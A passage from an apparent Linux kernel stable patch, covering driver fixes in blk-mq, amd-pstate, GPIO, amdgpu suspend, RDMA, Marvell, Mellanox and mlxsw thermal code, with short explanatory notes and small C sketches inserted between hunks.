++		if (test_bit(QUEUE_FLAG_HCTX_ACTIVE, &q->queue_flags) ||
++		    test_and_set_bit(QUEUE_FLAG_HCTX_ACTIVE, &q->queue_flags))
+ 			return;
+-		set_bit(QUEUE_FLAG_HCTX_ACTIVE, &q->queue_flags);
+ 	} else {
+-		if (test_bit(BLK_MQ_S_TAG_ACTIVE, &hctx->state))
++		if (test_bit(BLK_MQ_S_TAG_ACTIVE, &hctx->state) ||
++		    test_and_set_bit(BLK_MQ_S_TAG_ACTIVE, &hctx->state))
+ 			return;
+-		set_bit(BLK_MQ_S_TAG_ACTIVE, &hctx->state);
+ 	}
+ 
+ 	users = atomic_inc_return(&hctx->tags->active_queues);
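
The reordering works because test_and_set_bit() is an atomic
read-modify-write that dirties the cacheline even when the bit is already
set, while a plain read first keeps the line shared on the hot path. A
runnable C11 sketch of the idiom (flag name illustrative):

#include <stdatomic.h>
#include <stdio.h>

static atomic_ulong flags;

#define QUEUE_ACTIVE (1UL << 0)

/* Cheap shared read first; only do the RMW when the bit looks clear. */
static int mark_active(void)
{
	if (atomic_load_explicit(&flags, memory_order_relaxed) & QUEUE_ACTIVE)
		return 0;	/* already active: no cacheline dirtied */
	if (atomic_fetch_or(&flags, QUEUE_ACTIVE) & QUEUE_ACTIVE)
		return 0;	/* lost the race: someone else set it */
	return 1;		/* this caller transitioned it to active */
}

int main(void)
{
	printf("first call sets the bit: %d\n", mark_active());
	printf("second call is a no-op: %d\n", mark_active());
	return 0;
}
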
+diff --git a/drivers/cpufreq/amd-pstate.c b/drivers/cpufreq/amd-pstate.c
+index c17bd845f5fcb..f8d2bba9173d8 100644
+--- a/drivers/cpufreq/amd-pstate.c
++++ b/drivers/cpufreq/amd-pstate.c
+@@ -249,9 +249,8 @@ static int amd_pstate_verify(struct cpufreq_policy_data *policy)
+ 	return 0;
+ }
+ 
+-static int amd_pstate_target(struct cpufreq_policy *policy,
+-			     unsigned int target_freq,
+-			     unsigned int relation)
++static int amd_pstate_update_freq(struct cpufreq_policy *policy,
++				  unsigned int target_freq, bool fast_switch)
+ {
+ 	struct cpufreq_freqs freqs;
+ 	struct amd_cpudata *cpudata = policy->driver_data;
+@@ -270,26 +269,50 @@ static int amd_pstate_target(struct cpufreq_policy *policy,
+ 	des_perf = DIV_ROUND_CLOSEST(target_freq * cap_perf,
+ 				     cpudata->max_freq);
+ 
+-	cpufreq_freq_transition_begin(policy, &freqs);
+-	amd_pstate_update(cpudata, min_perf, des_perf,
+-			  max_perf, false);
+-	cpufreq_freq_transition_end(policy, &freqs, false);
++	WARN_ON(fast_switch && !policy->fast_switch_enabled);
++	/*
++	 * If fast_switch is desired, then there aren't any registered
++	 * transition notifiers. See comment for
++	 * cpufreq_enable_fast_switch().
++	 */
++	if (!fast_switch)
++		cpufreq_freq_transition_begin(policy, &freqs);
++
++	amd_pstate_update(cpudata, min_perf, des_perf, max_perf, fast_switch);
++
++	if (!fast_switch)
++		cpufreq_freq_transition_end(policy, &freqs, false);
+ 
+ 	return 0;
+ }
+ 
++static int amd_pstate_target(struct cpufreq_policy *policy,
++			     unsigned int target_freq,
++			     unsigned int relation)
++{
++	return amd_pstate_update_freq(policy, target_freq, false);
++}
++
++static unsigned int amd_pstate_fast_switch(struct cpufreq_policy *policy,
++				  unsigned int target_freq)
++{
++	return amd_pstate_update_freq(policy, target_freq, true);
++}
++
+ static void amd_pstate_adjust_perf(unsigned int cpu,
+ 				   unsigned long _min_perf,
+ 				   unsigned long target_perf,
+ 				   unsigned long capacity)
+ {
+ 	unsigned long max_perf, min_perf, des_perf,
+-		      cap_perf, lowest_nonlinear_perf;
++		      cap_perf, lowest_nonlinear_perf, max_freq;
+ 	struct cpufreq_policy *policy = cpufreq_cpu_get(cpu);
+ 	struct amd_cpudata *cpudata = policy->driver_data;
++	unsigned int target_freq;
+ 
+ 	cap_perf = READ_ONCE(cpudata->highest_perf);
+ 	lowest_nonlinear_perf = READ_ONCE(cpudata->lowest_nonlinear_perf);
++	max_freq = READ_ONCE(cpudata->max_freq);
+ 
+ 	des_perf = cap_perf;
+ 	if (target_perf < capacity)
+@@ -306,6 +329,10 @@ static void amd_pstate_adjust_perf(unsigned int cpu,
+ 	if (max_perf < min_perf)
+ 		max_perf = min_perf;
+ 
++	des_perf = clamp_t(unsigned long, des_perf, min_perf, max_perf);
++	target_freq = div_u64(des_perf * max_freq, max_perf);
++	policy->cur = target_freq;
++
+ 	amd_pstate_update(cpudata, min_perf, des_perf, max_perf, true);
+ 	cpufreq_cpu_put(policy);
+ }
+@@ -517,6 +544,7 @@ static int amd_pstate_cpu_exit(struct cpufreq_policy *policy)
+ 
+ 	freq_qos_remove_request(&cpudata->req[1]);
+ 	freq_qos_remove_request(&cpudata->req[0]);
++	policy->fast_switch_possible = false;
+ 	kfree(cpudata);
+ 
+ 	return 0;
+@@ -608,6 +636,7 @@ static struct cpufreq_driver amd_pstate_driver = {
+ 	.flags		= CPUFREQ_CONST_LOOPS | CPUFREQ_NEED_UPDATE_LIMITS,
+ 	.verify		= amd_pstate_verify,
+ 	.target		= amd_pstate_target,
++	.fast_switch    = amd_pstate_fast_switch,
+ 	.init		= amd_pstate_cpu_init,
+ 	.exit		= amd_pstate_cpu_exit,
+ 	.suspend	= amd_pstate_cpu_suspend,
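
Besides wiring up .fast_switch, the hunk clamps des_perf and records the
frequency actually requested so policy->cur stays truthful. A runnable
sketch of that clamp-and-scale arithmetic (the perf and frequency values
are illustrative, not real hardware numbers):

#include <inttypes.h>
#include <stdio.h>

static uint64_t clamp_u64(uint64_t v, uint64_t lo, uint64_t hi)
{
	return v < lo ? lo : (v > hi ? hi : v);
}

int main(void)
{
	uint64_t min_perf = 50, max_perf = 255, des_perf = 300;
	uint64_t max_freq = 4200000;	/* kHz */
	uint64_t target_freq;

	des_perf = clamp_u64(des_perf, min_perf, max_perf);
	/* mirror of div_u64(des_perf * max_freq, max_perf) */
	target_freq = des_perf * max_freq / max_perf;

	printf("des_perf=%" PRIu64 " target_freq=%" PRIu64 " kHz\n",
	       des_perf, target_freq);
	return 0;
}
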
+diff --git a/drivers/firmware/arm_ffa/driver.c b/drivers/firmware/arm_ffa/driver.c
+index 737f36e7a9035..5904a679d3512 100644
+--- a/drivers/firmware/arm_ffa/driver.c
++++ b/drivers/firmware/arm_ffa/driver.c
+@@ -274,7 +274,8 @@ __ffa_partition_info_get(u32 uuid0, u32 uuid1, u32 uuid2, u32 uuid3,
+ 	int idx, count, flags = 0, sz, buf_sz;
+ 	ffa_value_t partition_info;
+ 
+-	if (!buffer || !num_partitions) /* Just get the count for now */
++	if (drv_info->version > FFA_VERSION_1_0 &&
++	    (!buffer || !num_partitions)) /* Just get the count for now */
+ 		flags = PARTITION_INFO_GET_RETURN_COUNT_ONLY;
+ 
+ 	mutex_lock(&drv_info->rx_lock);
+diff --git a/drivers/gpio/Kconfig b/drivers/gpio/Kconfig
+index e3af86f06c630..3e8e5f4ffa59f 100644
+--- a/drivers/gpio/Kconfig
++++ b/drivers/gpio/Kconfig
+@@ -882,7 +882,7 @@ config GPIO_F7188X
+ 	help
+ 	  This option enables support for GPIOs found on Fintek Super-I/O
+ 	  chips F71869, F71869A, F71882FG, F71889F and F81866.
+-	  As well as Nuvoton Super-I/O chip NCT6116D.
++	  As well as Nuvoton Super-I/O chip NCT6126D.
+ 
+ 	  To compile this driver as a module, choose M here: the module will
+ 	  be called f7188x-gpio.
+diff --git a/drivers/gpio/gpio-f7188x.c b/drivers/gpio/gpio-f7188x.c
+index 9effa7769bef5..f54ca5a1775ea 100644
+--- a/drivers/gpio/gpio-f7188x.c
++++ b/drivers/gpio/gpio-f7188x.c
+@@ -48,7 +48,7 @@
+ /*
+  * Nuvoton devices.
+  */
+-#define SIO_NCT6116D_ID		0xD283  /* NCT6116D chipset ID */
++#define SIO_NCT6126D_ID		0xD283  /* NCT6126D chipset ID */
+ 
+ #define SIO_LD_GPIO_NUVOTON	0x07	/* GPIO logical device */
+ 
+@@ -62,7 +62,7 @@ enum chips {
+ 	f81866,
+ 	f81804,
+ 	f81865,
+-	nct6116d,
++	nct6126d,
+ };
+ 
+ static const char * const f7188x_names[] = {
+@@ -74,7 +74,7 @@ static const char * const f7188x_names[] = {
+ 	"f81866",
+ 	"f81804",
+ 	"f81865",
+-	"nct6116d",
++	"nct6126d",
+ };
+ 
+ struct f7188x_sio {
+@@ -187,8 +187,8 @@ static int f7188x_gpio_set_config(struct gpio_chip *chip, unsigned offset,
+ /* Output mode register (0:open drain 1:push-pull). */
+ #define f7188x_gpio_out_mode(base) ((base) + 3)
+ 
+-#define f7188x_gpio_dir_invert(type)	((type) == nct6116d)
+-#define f7188x_gpio_data_single(type)	((type) == nct6116d)
++#define f7188x_gpio_dir_invert(type)	((type) == nct6126d)
++#define f7188x_gpio_data_single(type)	((type) == nct6126d)
+ 
+ static struct f7188x_gpio_bank f71869_gpio_bank[] = {
+ 	F7188X_GPIO_BANK(0, 6, 0xF0, DRVNAME "-0"),
+@@ -274,7 +274,7 @@ static struct f7188x_gpio_bank f81865_gpio_bank[] = {
+ 	F7188X_GPIO_BANK(60, 5, 0x90, DRVNAME "-6"),
+ };
+ 
+-static struct f7188x_gpio_bank nct6116d_gpio_bank[] = {
++static struct f7188x_gpio_bank nct6126d_gpio_bank[] = {
+ 	F7188X_GPIO_BANK(0, 8, 0xE0, DRVNAME "-0"),
+ 	F7188X_GPIO_BANK(10, 8, 0xE4, DRVNAME "-1"),
+ 	F7188X_GPIO_BANK(20, 8, 0xE8, DRVNAME "-2"),
+@@ -282,7 +282,7 @@ static struct f7188x_gpio_bank nct6116d_gpio_bank[] = {
+ 	F7188X_GPIO_BANK(40, 8, 0xF0, DRVNAME "-4"),
+ 	F7188X_GPIO_BANK(50, 8, 0xF4, DRVNAME "-5"),
+ 	F7188X_GPIO_BANK(60, 8, 0xF8, DRVNAME "-6"),
+-	F7188X_GPIO_BANK(70, 1, 0xFC, DRVNAME "-7"),
++	F7188X_GPIO_BANK(70, 8, 0xFC, DRVNAME "-7"),
+ };
+ 
+ static int f7188x_gpio_get_direction(struct gpio_chip *chip, unsigned offset)
+@@ -490,9 +490,9 @@ static int f7188x_gpio_probe(struct platform_device *pdev)
+ 		data->nr_bank = ARRAY_SIZE(f81865_gpio_bank);
+ 		data->bank = f81865_gpio_bank;
+ 		break;
+-	case nct6116d:
+-		data->nr_bank = ARRAY_SIZE(nct6116d_gpio_bank);
+-		data->bank = nct6116d_gpio_bank;
++	case nct6126d:
++		data->nr_bank = ARRAY_SIZE(nct6126d_gpio_bank);
++		data->bank = nct6126d_gpio_bank;
+ 		break;
+ 	default:
+ 		return -ENODEV;
+@@ -559,9 +559,9 @@ static int __init f7188x_find(int addr, struct f7188x_sio *sio)
+ 	case SIO_F81865_ID:
+ 		sio->type = f81865;
+ 		break;
+-	case SIO_NCT6116D_ID:
++	case SIO_NCT6126D_ID:
+ 		sio->device = SIO_LD_GPIO_NUVOTON;
+-		sio->type = nct6116d;
++		sio->type = nct6126d;
+ 		break;
+ 	default:
+ 		pr_info("Unsupported Fintek device 0x%04x\n", devid);
+@@ -569,7 +569,7 @@ static int __init f7188x_find(int addr, struct f7188x_sio *sio)
+ 	}
+ 
+ 	/* double check manufacturer where possible */
+-	if (sio->type != nct6116d) {
++	if (sio->type != nct6126d) {
+ 		manid = superio_inw(addr, SIO_FINTEK_MANID);
+ 		if (manid != SIO_FINTEK_ID) {
+ 			pr_debug("Not a Fintek device at 0x%08x\n", addr);
+@@ -581,7 +581,7 @@ static int __init f7188x_find(int addr, struct f7188x_sio *sio)
+ 	err = 0;
+ 
+ 	pr_info("Found %s at %#x\n", f7188x_names[sio->type], (unsigned int)addr);
+-	if (sio->type != nct6116d)
++	if (sio->type != nct6126d)
+ 		pr_info("   revision %d\n", superio_inb(addr, SIO_FINTEK_DEVREV));
+ 
+ err:
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
+index a78e80f9f65cd..e32bd990800de 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
+@@ -1083,6 +1083,9 @@ bool amdgpu_acpi_is_s0ix_active(struct amdgpu_device *adev)
+ 	    (pm_suspend_target_state != PM_SUSPEND_TO_IDLE))
+ 		return false;
+ 
++	if (adev->asic_type < CHIP_RAVEN)
++		return false;
++
+ 	/*
+ 	 * If ACPI_FADT_LOW_POWER_S0 is not set in the FADT, it is generally
+ 	 * risky to do any special firmware-related preparations for entering
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index 871f481f84328..88a9ece7f4647 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -2402,8 +2402,10 @@ static int amdgpu_pmops_suspend(struct device *dev)
+ 
+ 	if (amdgpu_acpi_is_s0ix_active(adev))
+ 		adev->in_s0ix = true;
+-	else
++	else if (amdgpu_acpi_is_s3_active(adev))
+ 		adev->in_s3 = true;
++	if (!adev->in_s0ix && !adev->in_s3)
++		return 0;
+ 	return amdgpu_device_suspend(drm_dev, true);
+ }
+ 
+@@ -2424,6 +2426,9 @@ static int amdgpu_pmops_resume(struct device *dev)
+ 	struct amdgpu_device *adev = drm_to_adev(drm_dev);
+ 	int r;
+ 
++	if (!adev->in_s0ix && !adev->in_s3)
++		return 0;
++
+ 	/* Avoids registers access if device is physically gone */
+ 	if (!pci_device_is_present(adev->pdev))
+ 		adev->no_hw_access = true;
+diff --git a/drivers/infiniband/sw/rxe/rxe_qp.c b/drivers/infiniband/sw/rxe/rxe_qp.c
+index e459fb542b83a..1f6e006c51c4a 100644
+--- a/drivers/infiniband/sw/rxe/rxe_qp.c
++++ b/drivers/infiniband/sw/rxe/rxe_qp.c
+@@ -792,8 +792,11 @@ static void rxe_qp_do_cleanup(struct work_struct *work)
+ 		del_timer_sync(&qp->rnr_nak_timer);
+ 	}
+ 
+-	rxe_cleanup_task(&qp->req.task);
+-	rxe_cleanup_task(&qp->comp.task);
++	if (qp->req.task.func)
++		rxe_cleanup_task(&qp->req.task);
++
++	if (qp->comp.task.func)
++		rxe_cleanup_task(&qp->comp.task);
+ 
+ 	/* flush out any receive wr's or pending requests */
+ 	if (qp->req.task.func)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+index 8fdd3afe59981..afdddfced7e69 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+@@ -1225,6 +1225,14 @@ static inline void link_status_user_format(u64 lstat,
+ 	linfo->an = FIELD_GET(RESP_LINKSTAT_AN, lstat);
+ 	linfo->fec = FIELD_GET(RESP_LINKSTAT_FEC, lstat);
+ 	linfo->lmac_type_id = cgx_get_lmac_type(cgx, lmac_id);
++
++	if (linfo->lmac_type_id >= LMAC_MODE_MAX) {
++		dev_err(&cgx->pdev->dev, "Unknown lmac_type_id %d reported by firmware on cgx port%d:%d",
++			linfo->lmac_type_id, cgx->cgx_id, lmac_id);
++		strncpy(linfo->lmac_type, "Unknown", LMACTYPE_STR_LEN - 1);
++		return;
++	}
++
+ 	lmac_string = cgx_lmactype_string[linfo->lmac_type_id];
+ 	strncpy(linfo->lmac_type, lmac_string, LMACTYPE_STR_LEN - 1);
+ }
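
lmac_type_id comes straight from a firmware response, so it has to be
range-checked before indexing cgx_lmactype_string[]; otherwise a buggy
reply reads past the table. A runnable sketch of that defensive lookup
(the table is an illustrative subset):

#include <stdio.h>

static const char *const lmac_type_str[] = {
	"SGMII", "XAUI", "RXAUI", "10G_R",
};

#define LMAC_MODE_MAX (sizeof(lmac_type_str) / sizeof(lmac_type_str[0]))

static const char *lmac_type_name(unsigned int id)
{
	/* id is untrusted input: validate before the array access */
	if (id >= LMAC_MODE_MAX)
		return "Unknown";
	return lmac_type_str[id];
}

int main(void)
{
	printf("%s\n", lmac_type_name(1));	/* XAUI */
	printf("%s\n", lmac_type_name(42));	/* Unknown, not out of bounds */
	return 0;
}
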
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
+index 821c78bab3732..a3daca44f74b1 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
+@@ -340,6 +340,7 @@ struct mlx5_eswitch {
+ 	}  params;
+ 	struct blocking_notifier_head n_head;
+ 	struct dentry *dbgfs;
++	bool paired[MLX5_MAX_PORTS];
+ };
+ 
+ void esw_offloads_disable(struct mlx5_eswitch *esw);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+index 5235b5a7b9637..433cdd0a2cf34 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+@@ -2827,6 +2827,9 @@ static int mlx5_esw_offloads_devcom_event(int event,
+ 		    mlx5_eswitch_vport_match_metadata_enabled(peer_esw))
+ 			break;
+ 
++		if (esw->paired[mlx5_get_dev_index(peer_esw->dev)])
++			break;
++
+ 		err = mlx5_esw_offloads_set_ns_peer(esw, peer_esw, true);
+ 		if (err)
+ 			goto err_out;
+@@ -2838,14 +2841,18 @@ static int mlx5_esw_offloads_devcom_event(int event,
+ 		if (err)
+ 			goto err_pair;
+ 
++		esw->paired[mlx5_get_dev_index(peer_esw->dev)] = true;
++		peer_esw->paired[mlx5_get_dev_index(esw->dev)] = true;
+ 		mlx5_devcom_set_paired(devcom, MLX5_DEVCOM_ESW_OFFLOADS, true);
+ 		break;
+ 
+ 	case ESW_OFFLOADS_DEVCOM_UNPAIR:
+-		if (!mlx5_devcom_is_paired(devcom, MLX5_DEVCOM_ESW_OFFLOADS))
++		if (!esw->paired[mlx5_get_dev_index(peer_esw->dev)])
+ 			break;
+ 
+ 		mlx5_devcom_set_paired(devcom, MLX5_DEVCOM_ESW_OFFLOADS, false);
++		esw->paired[mlx5_get_dev_index(peer_esw->dev)] = false;
++		peer_esw->paired[mlx5_get_dev_index(esw->dev)] = false;
+ 		mlx5_esw_offloads_unpair(peer_esw);
+ 		mlx5_esw_offloads_unpair(esw);
+ 		mlx5_esw_offloads_set_ns_peer(esw, peer_esw, false);
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/core_thermal.c b/drivers/net/ethernet/mellanox/mlxsw/core_thermal.c
+index 09ed6e5fa6c34..ef5e61708df39 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/core_thermal.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/core_thermal.c
+@@ -36,39 +36,33 @@ enum mlxsw_thermal_trips {
+ 	MLXSW_THERMAL_TEMP_TRIP_HOT,
+ };
+ 
+-struct mlxsw_cooling_states {
++struct mlxsw_thermal_trip {
++	int	type;
++	int	temp;
++	int	hyst;
+ 	int	min_state;
+ 	int	max_state;
+ };
+ 
+-static const struct thermal_trip default_thermal_trips[] = {
++static const struct mlxsw_thermal_trip default_thermal_trips[] = {
+ 	{	/* In range - 0-40% PWM */
+ 		.type		= THERMAL_TRIP_ACTIVE,
+-		.temperature	= MLXSW_THERMAL_ASIC_TEMP_NORM,
+-		.hysteresis	= MLXSW_THERMAL_HYSTERESIS_TEMP,
+-	},
+-	{
+-		/* In range - 40-100% PWM */
+-		.type		= THERMAL_TRIP_ACTIVE,
+-		.temperature	= MLXSW_THERMAL_ASIC_TEMP_HIGH,
+-		.hysteresis	= MLXSW_THERMAL_HYSTERESIS_TEMP,
+-	},
+-	{	/* Warning */
+-		.type		= THERMAL_TRIP_HOT,
+-		.temperature	= MLXSW_THERMAL_ASIC_TEMP_HOT,
+-	},
+-};
+-
+-static const struct mlxsw_cooling_states default_cooling_states[] = {
+-	{
++		.temp		= MLXSW_THERMAL_ASIC_TEMP_NORM,
++		.hyst		= MLXSW_THERMAL_HYSTERESIS_TEMP,
+ 		.min_state	= 0,
+ 		.max_state	= (4 * MLXSW_THERMAL_MAX_STATE) / 10,
+ 	},
+ 	{
++		/* In range - 40-100% PWM */
++		.type		= THERMAL_TRIP_ACTIVE,
++		.temp		= MLXSW_THERMAL_ASIC_TEMP_HIGH,
++		.hyst		= MLXSW_THERMAL_HYSTERESIS_TEMP,
+ 		.min_state	= (4 * MLXSW_THERMAL_MAX_STATE) / 10,
+ 		.max_state	= MLXSW_THERMAL_MAX_STATE,
+ 	},
+-	{
++	{	/* Warning */
++		.type		= THERMAL_TRIP_HOT,
++		.temp		= MLXSW_THERMAL_ASIC_TEMP_HOT,
+ 		.min_state	= MLXSW_THERMAL_MAX_STATE,
+ 		.max_state	= MLXSW_THERMAL_MAX_STATE,
+ 	},
+@@ -84,8 +78,7 @@ struct mlxsw_thermal;
+ struct mlxsw_thermal_module {
+ 	struct mlxsw_thermal *parent;
+ 	struct thermal_zone_device *tzdev;
+-	struct thermal_trip trips[MLXSW_THERMAL_NUM_TRIPS];
+-	struct mlxsw_cooling_states cooling_states[MLXSW_THERMAL_NUM_TRIPS];
++	struct mlxsw_thermal_trip trips[MLXSW_THERMAL_NUM_TRIPS];
+ 	int module; /* Module or gearbox number */
+ 	u8 slot_index;
+ };
+@@ -105,8 +98,7 @@ struct mlxsw_thermal {
+ 	struct thermal_zone_device *tzdev;
+ 	int polling_delay;
+ 	struct thermal_cooling_device *cdevs[MLXSW_MFCR_PWMS_MAX];
+-	struct thermal_trip trips[MLXSW_THERMAL_NUM_TRIPS];
+-	struct mlxsw_cooling_states cooling_states[MLXSW_THERMAL_NUM_TRIPS];
++	struct mlxsw_thermal_trip trips[MLXSW_THERMAL_NUM_TRIPS];
+ 	struct mlxsw_thermal_area line_cards[];
+ };
+ 
+@@ -143,9 +135,9 @@ static int mlxsw_get_cooling_device_idx(struct mlxsw_thermal *thermal,
+ static void
+ mlxsw_thermal_module_trips_reset(struct mlxsw_thermal_module *tz)
+ {
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temperature = 0;
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HIGH].temperature = 0;
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HOT].temperature = 0;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temp = 0;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HIGH].temp = 0;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HOT].temp = 0;
+ }
+ 
+ static int
+@@ -187,12 +179,12 @@ mlxsw_thermal_module_trips_update(struct device *dev, struct mlxsw_core *core,
+ 	 * by subtracting double hysteresis value.
+ 	 */
+ 	if (crit_temp >= MLXSW_THERMAL_MODULE_TEMP_SHIFT)
+-		tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temperature = crit_temp -
++		tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temp = crit_temp -
+ 					MLXSW_THERMAL_MODULE_TEMP_SHIFT;
+ 	else
+-		tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temperature = crit_temp;
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HIGH].temperature = crit_temp;
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HOT].temperature = emerg_temp;
++		tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temp = crit_temp;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HIGH].temp = crit_temp;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HOT].temp = emerg_temp;
+ 
+ 	return 0;
+ }
+@@ -209,11 +201,11 @@ static int mlxsw_thermal_bind(struct thermal_zone_device *tzdev,
+ 		return 0;
+ 
+ 	for (i = 0; i < MLXSW_THERMAL_NUM_TRIPS; i++) {
+-		const struct mlxsw_cooling_states *state = &thermal->cooling_states[i];
++		const struct mlxsw_thermal_trip *trip = &thermal->trips[i];
+ 
+ 		err = thermal_zone_bind_cooling_device(tzdev, i, cdev,
+-						       state->max_state,
+-						       state->min_state,
++						       trip->max_state,
++						       trip->min_state,
+ 						       THERMAL_WEIGHT_DEFAULT);
+ 		if (err < 0) {
+ 			dev_err(dev, "Failed to bind cooling device to trip %d\n", i);
+@@ -267,6 +259,61 @@ static int mlxsw_thermal_get_temp(struct thermal_zone_device *tzdev,
+ 	return 0;
+ }
+ 
++static int mlxsw_thermal_get_trip_type(struct thermal_zone_device *tzdev,
++				       int trip,
++				       enum thermal_trip_type *p_type)
++{
++	struct mlxsw_thermal *thermal = tzdev->devdata;
++
++	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
++		return -EINVAL;
++
++	*p_type = thermal->trips[trip].type;
++	return 0;
++}
++
++static int mlxsw_thermal_get_trip_temp(struct thermal_zone_device *tzdev,
++				       int trip, int *p_temp)
++{
++	struct mlxsw_thermal *thermal = tzdev->devdata;
++
++	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
++		return -EINVAL;
++
++	*p_temp = thermal->trips[trip].temp;
++	return 0;
++}
++
++static int mlxsw_thermal_set_trip_temp(struct thermal_zone_device *tzdev,
++				       int trip, int temp)
++{
++	struct mlxsw_thermal *thermal = tzdev->devdata;
++
++	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
++		return -EINVAL;
++
++	thermal->trips[trip].temp = temp;
++	return 0;
++}
++
++static int mlxsw_thermal_get_trip_hyst(struct thermal_zone_device *tzdev,
++				       int trip, int *p_hyst)
++{
++	struct mlxsw_thermal *thermal = tzdev->devdata;
++
++	*p_hyst = thermal->trips[trip].hyst;
++	return 0;
++}
++
++static int mlxsw_thermal_set_trip_hyst(struct thermal_zone_device *tzdev,
++				       int trip, int hyst)
++{
++	struct mlxsw_thermal *thermal = tzdev->devdata;
++
++	thermal->trips[trip].hyst = hyst;
++	return 0;
++}
++
+ static struct thermal_zone_params mlxsw_thermal_params = {
+ 	.no_hwmon = true,
+ };
+@@ -275,6 +322,11 @@ static struct thermal_zone_device_ops mlxsw_thermal_ops = {
+ 	.bind = mlxsw_thermal_bind,
+ 	.unbind = mlxsw_thermal_unbind,
+ 	.get_temp = mlxsw_thermal_get_temp,
++	.get_trip_type	= mlxsw_thermal_get_trip_type,
++	.get_trip_temp	= mlxsw_thermal_get_trip_temp,
++	.set_trip_temp	= mlxsw_thermal_set_trip_temp,
++	.get_trip_hyst	= mlxsw_thermal_get_trip_hyst,
++	.set_trip_hyst	= mlxsw_thermal_set_trip_hyst,
+ };
+ 
+ static int mlxsw_thermal_module_bind(struct thermal_zone_device *tzdev,
+@@ -289,11 +341,11 @@ static int mlxsw_thermal_module_bind(struct thermal_zone_device *tzdev,
+ 		return 0;
+ 
+ 	for (i = 0; i < MLXSW_THERMAL_NUM_TRIPS; i++) {
+-		const struct mlxsw_cooling_states *state = &tz->cooling_states[i];
++		const struct mlxsw_thermal_trip *trip = &tz->trips[i];
+ 
+ 		err = thermal_zone_bind_cooling_device(tzdev, i, cdev,
+-						       state->max_state,
+-						       state->min_state,
++						       trip->max_state,
++						       trip->min_state,
+ 						       THERMAL_WEIGHT_DEFAULT);
+ 		if (err < 0)
+ 			goto err_thermal_zone_bind_cooling_device;
+@@ -381,10 +433,74 @@ static int mlxsw_thermal_module_temp_get(struct thermal_zone_device *tzdev,
+ 	return 0;
+ }
+ 
++static int
++mlxsw_thermal_module_trip_type_get(struct thermal_zone_device *tzdev, int trip,
++				   enum thermal_trip_type *p_type)
++{
++	struct mlxsw_thermal_module *tz = tzdev->devdata;
++
++	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
++		return -EINVAL;
++
++	*p_type = tz->trips[trip].type;
++	return 0;
++}
++
++static int
++mlxsw_thermal_module_trip_temp_get(struct thermal_zone_device *tzdev,
++				   int trip, int *p_temp)
++{
++	struct mlxsw_thermal_module *tz = tzdev->devdata;
++
++	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
++		return -EINVAL;
++
++	*p_temp = tz->trips[trip].temp;
++	return 0;
++}
++
++static int
++mlxsw_thermal_module_trip_temp_set(struct thermal_zone_device *tzdev,
++				   int trip, int temp)
++{
++	struct mlxsw_thermal_module *tz = tzdev->devdata;
++
++	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
++		return -EINVAL;
++
++	tz->trips[trip].temp = temp;
++	return 0;
++}
++
++static int
++mlxsw_thermal_module_trip_hyst_get(struct thermal_zone_device *tzdev, int trip,
++				   int *p_hyst)
++{
++	struct mlxsw_thermal_module *tz = tzdev->devdata;
++
++	*p_hyst = tz->trips[trip].hyst;
++	return 0;
++}
++
++static int
++mlxsw_thermal_module_trip_hyst_set(struct thermal_zone_device *tzdev, int trip,
++				   int hyst)
++{
++	struct mlxsw_thermal_module *tz = tzdev->devdata;
++
++	tz->trips[trip].hyst = hyst;
++	return 0;
++}
++
+ static struct thermal_zone_device_ops mlxsw_thermal_module_ops = {
+ 	.bind		= mlxsw_thermal_module_bind,
+ 	.unbind		= mlxsw_thermal_module_unbind,
+ 	.get_temp	= mlxsw_thermal_module_temp_get,
++	.get_trip_type	= mlxsw_thermal_module_trip_type_get,
++	.get_trip_temp	= mlxsw_thermal_module_trip_temp_get,
++	.set_trip_temp	= mlxsw_thermal_module_trip_temp_set,
++	.get_trip_hyst	= mlxsw_thermal_module_trip_hyst_get,
